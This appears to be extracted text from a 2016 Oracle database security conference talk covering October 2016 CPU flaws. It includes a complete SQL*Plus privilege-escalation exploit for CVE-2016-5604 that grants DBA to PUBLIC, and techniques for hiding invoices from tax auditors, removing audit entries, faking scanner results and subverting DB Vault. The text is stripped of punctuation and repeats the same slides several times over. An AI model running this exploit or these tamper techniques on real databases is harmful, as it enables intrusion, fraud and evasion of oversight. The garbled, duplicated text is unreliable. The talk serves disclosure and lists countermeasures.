and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
